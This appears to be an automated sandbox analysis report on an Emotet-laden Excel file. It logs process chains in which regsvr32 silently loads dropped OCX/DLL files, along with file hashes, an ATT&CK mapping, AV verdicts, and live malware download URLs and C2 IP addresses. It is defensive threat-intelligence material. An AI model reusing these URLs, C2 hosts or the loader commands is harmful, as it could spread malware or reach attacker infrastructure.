            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800088587_2_0000000180008858
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800268607_2_0000000180026860
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002666C7_2_000000018002666C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800134707_2_0000000180013470
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E0707_2_000000018001E070
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800112707_2_0000000180011270
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800084707_2_0000000180008470
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000E4747_2_000000018000E474
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001D6787_2_000000018001D678
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180021C807_2_0000000180021C80
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800050807_2_0000000180005080
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180006A807_2_0000000180006A80
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000B8807_2_000000018000B880
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000E8807_2_000000018000E880
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800222847_2_0000000180022284
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800094887_2_0000000180009488
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D2887_2_000000018000D288
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180020C8C7_2_0000000180020C8C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000CA8C7_2_000000018000CA8C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D4907_2_000000018000D490
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001A0947_2_000000018001A094
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000EC987_2_000000018000EC98
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800256A07_2_00000001800256A0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800048A07_2_00000001800048A0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D6A47_2_000000018000D6A4
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800224A87_2_00000001800224A8
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180001EAC7_2_0000000180001EAC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180002EB07_2_0000000180002EB0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001EABC7_2_000000018001EABC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180016EC07_2_0000000180016EC0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000CEC07_2_000000018000CEC0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001A4D07_2_000000018001A4D0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000FCD07_2_000000018000FCD0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180003ED47_2_0000000180003ED4
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180003CE47_2_0000000180003CE4
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800248E87_2_00000001800248E8
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800012EC7_2_00000001800012EC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800138F07_2_00000001800138F0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800252F47_2_00000001800252F4
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180023EFC7_2_0000000180023EFC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180013D147_2_0000000180013D14
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800041187_2_0000000180004118
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800121207_2_0000000180012120
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001F1217_2_000000018001F121
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180010D287_2_0000000180010D28
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180011D307_2_0000000180011D30
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800065387_2_0000000180006538
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002413C7_2_000000018002413C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001973C7_2_000000018001973C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001D5447_2_000000018001D544
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002034C7_2_000000018002034C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180020B507_2_0000000180020B50
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002275C7_2_000000018002275C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018002556C7_2_000000018002556C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001E9707_2_000000018001E970
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180001D747_2_0000000180001D74
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000E7787_2_000000018000E778
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180018B807_2_0000000180018B80
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180001F847_2_0000000180001F84
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180013F887_2_0000000180013F88
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001018C7_2_000000018001018C
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001FD907_2_000000018001FD90
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000D9907_2_000000018000D990
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000EF947_2_000000018000EF94
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180022BA07_2_0000000180022BA0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800031A87_2_00000001800031A8
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180020DB07_2_0000000180020DB0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001B3B07_2_000000018001B3B0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180017BB07_2_0000000180017BB0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000BFC87_2_000000018000BFC8
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800195D07_2_00000001800195D0
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800259D87_2_00000001800259D8
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018001BDD87_2_000000018001BDD8
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800049D87_2_00000001800049D8
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000F1D87_2_000000018000F1D8
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800213DC7_2_00000001800213DC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800045DC7_2_00000001800045DC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800089DC7_2_00000001800089DC
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800079E07_2_00000001800079E0
            Source: 242.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: documentazione 68668.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
            Source: documentazione 68668.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
            Source: wdusx2.ocx.0.drStatic PE information: Number of sections : 12 > 10
            Source: UVvnppK[1].dll.0.drStatic PE information: Number of sections : 12 > 10
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll 1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
            Source: Joe Sandbox ViewDropped File: C:\Users\user\wdusx2.ocx 1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
            Source: Joe Sandbox ViewDropped File: C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy) 1EC9DC22A44EB1BD30B4C56B12CCAE1CFCB67F9ABA8F3A8E4A3DE562D237371E
            Source: documentazione 68668.xlsVirustotal: Detection: 55%
            Source: documentazione 68668.xlsMetadefender: Detection: 37%
            Source: documentazione 68668.xlsReversingLabs: Detection: 73%
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocxJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocxJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocxJump to behavior
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll"Jump to behavior
            Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\wdusx2.ocxJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5E64.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@10/13@3/45
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: documentazione 68668.xlsOLE indicator, Workbook stream: true
            Source: documentazione 68668.xls.0.drOLE indicator, Workbook stream: true
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020760 Process32NextW,CreateToolhelp32Snapshot,Process32FirstW,CloseHandle,6_2_0000000180020760
            Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: documentazione 68668.xlsInitial sample: OLE indicators vbamacros = False
            Source: UVvnppK[1].dll.0.drStatic PE information: section name: .xdata
            Source: wdusx2.ocx.0.drStatic PE information: section name: .xdata
            Source: wdusx2.ocx.0.drStatic PE information: real checksum: 0xab9d6 should be: 0xad231
            Source: UVvnppK[1].dll.0.drStatic PE information: real checksum: 0xab9d6 should be: 0xad231
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dllJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\wdusx2.ocxJump to dropped file
            Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy)Jump to dropped file
            Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy)Jump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\wdusx2.ocxJump to dropped file

            Boot Survival

            barindex
            Drops PE files to the user root directory
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\wdusx2.ocxJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\regsvr32.exe TID: 2188Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\System32\regsvr32.exe TID: 2924Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dllJump to dropped file
            Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_000000018000C3D8 FindNextFileW,FindFirstFileW,7_2_000000018000C3D8
            Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_61A020C0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,6_2_61A020C0
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_61A0A268 SetUnhandledExceptionFilter,Sleep,6_2_61A0A268
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_61A0A268 SetUnhandledExceptionFilter,Sleep,6_2_61A0A268

            HIPS / PFW / Operating System Protection Evasion

            barindex
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 165.22.254.68 443Jump to behavior
            Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 198.199.70.22 8080Jump to behavior
            Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll"Jump to behavior
            Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_61A01FF0 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,6_2_61A01FF0

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Yara detected Emotet
            Source: Yara matchFile source: 7.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.regsvr32.exe.4b0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.regsvr32.exe.4b0000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 7.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts2
            Scripting            		Path Interception111
            Process Injection            		131
            Masquerading            		OS Credential Dumping1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium11
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts43
            Exploitation for Client Execution            		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		LSASS Memory1
            Security Software Discovery            		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
            Non-Standard Port            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
            Virtualization/Sandbox Evasion            		Security Account Manager1
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration15
            Ingress Tool Transfer            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
            Process Injection            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput CaptureScheduled Transfer3
            Non-Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
            Scripting            		LSA Secrets1
            Remote System Discovery            		SSHKeyloggingData Transfer Size Limits124
            Application Layer Protocol            		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Hidden Files and Directories            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items1
            Regsvr32            		DCSync15
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 679676 Sample: documentazione 68668.xls Startdate: 06/08/2022 Architecture: WINDOWS Score: 100 35 103.224.241.74 WEBWERKS-AS-INWebWerksIndiaPvtLtdIN India 2->35 37 202.29.239.162 UNINET-AS-APUNINET-TH Thailand 2->37 39 38 other IPs or domains 2->39 53 Snort IDS alert for network traffic 2->53 55 Multi AV Scanner detection for domain / URL 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 15 other signatures 2->59 8 EXCEL.EXE 53 25 2->8         started        13 svchost.exe 2->13         started        signatures3 process4 dnsIp5 45 zardamarine.com 208.67.23.91, 443, 49171 GTT-BACKBONEGTTDE United States 8->45 47 www.zardamarine.com 8->47 49 2 other IPs or domains 8->49 27 C:\Users\user\wdusx2.ocx, PE32+ 8->27 dropped 29 C:\Users\user\AppData\...\UVvnppK[1].dll, PE32+ 8->29 dropped 31 C:\Users\user\...\documentazione 68668.xls, Composite 8->31 dropped 63 Document exploit detected (creates forbidden files) 8->63 65 Document exploit detected (UrlDownloadToFile) 8->65 15 regsvr32.exe 2 8->15         started        19 regsvr32.exe 8->19         started        21 regsvr32.exe 8->21         started        file6 signatures7 process8 file9 33 C:\Windows\...\BlVTVcJlqYTKwC.dll (copy), PE32+ 15->33 dropped 51 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->51 23 regsvr32.exe 2 15->23         started        signatures10 process11 dnsIp12 41 165.22.254.68, 443, 49174, 49175 DIGITALOCEAN-ASNUS United States 23->41 43 198.199.70.22, 49177, 8080 DIGITALOCEAN-ASNUS United States 23->43 61 System process connects to network (likely due to code injection or exploit) 23->61 signatures13

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            documentazione 68668.xls55%VirustotalBrowse
            documentazione 68668.xls37%MetadefenderBrowse
            documentazione 68668.xls73%ReversingLabsDocument-Excel.Trojan.Abracadabra
            documentazione 68668.xls100%AviraXF/Agent.B2

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll100%AviraTR/Crypt.Agent.hwpwp
            C:\Users\user\wdusx2.ocx100%AviraTR/Crypt.Agent.hwpwp
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll40%MetadefenderBrowse
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UVvnppK[1].dll88%ReversingLabsWin64.Trojan.Emotet
            C:\Users\user\wdusx2.ocx40%MetadefenderBrowse
            C:\Users\user\wdusx2.ocx88%ReversingLabsWin64.Trojan.Emotet
            C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy)40%MetadefenderBrowse
            C:\Windows\System32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll (copy)88%ReversingLabsWin64.Trojan.Emotet

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            7.2.regsvr32.exe.140000.0.unpack100%AviraHEUR/AGEN.1215461Download File
            6.2.regsvr32.exe.4b0000.0.unpack100%AviraHEUR/AGEN.1215461Download File

            Domains

            SourceDetectionScannerLabelLink
            zardamarine.com11%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://kronostr.com/tr/68yHRhfuU7Qj/100%Avira URL Cloudmalware
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
            https://www.zardamarine.com/images/psQbAjrrEOXWPrS/100%Avira URL Cloudmalware
            http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/100%Avira URL Cloudmalware
            http://ocsp.entrust.net030%URL Reputationsafe
            https://198.199.70.22/B100%Avira URL Cloudmalware
            https://165.22.254.68/O100%Avira URL Cloudmalware
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            https://165.22.254.68/0%URL Reputationsafe
            https://198.199.70.22/080/F100%Avira URL Cloudmalware
            https://198.199.70.22:8080/e100%Avira URL Cloudmalware
            https://198.199.70.22:8080/a100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            zardamarine.com
            		208.67.23.91
            		truetrueunknown
            labfitouts.com
            		66.96.149.19
            		truefalse
              		unknown
              kronostr.com
              		188.132.217.108
              		truefalse
                		unknown
                www.zardamarine.com
                		unknown
                		unknowntrue
                  		unknown

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://kronostr.com/tr/68yHRhfuU7Qj/true
                  • Avira URL Cloud: malware
                  		unknown
                  https://www.zardamarine.com/images/psQbAjrrEOXWPrS/true
                  • Avira URL Cloud: malware
                  		unknown
                  http://labfitouts.com/cgi-bin/Rea3Iu3wGvgAbTset0/true
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://crl.entrust.net/server1.crl0regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://ocsp.entrust.net03regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://198.199.70.22/Bregsvr32.exe, 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://165.22.254.68/Oregsvr32.exe, 00000007.00000002.1197000736.00000000003F3000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: malware
                    		unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000002.1197051970.0000000000443000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000007.00000003.1002852699.0000000000443000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://ocsp.entrust.net0Dregsvr32.exe, 00000007.00000002.1197156403.0000000002C28000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
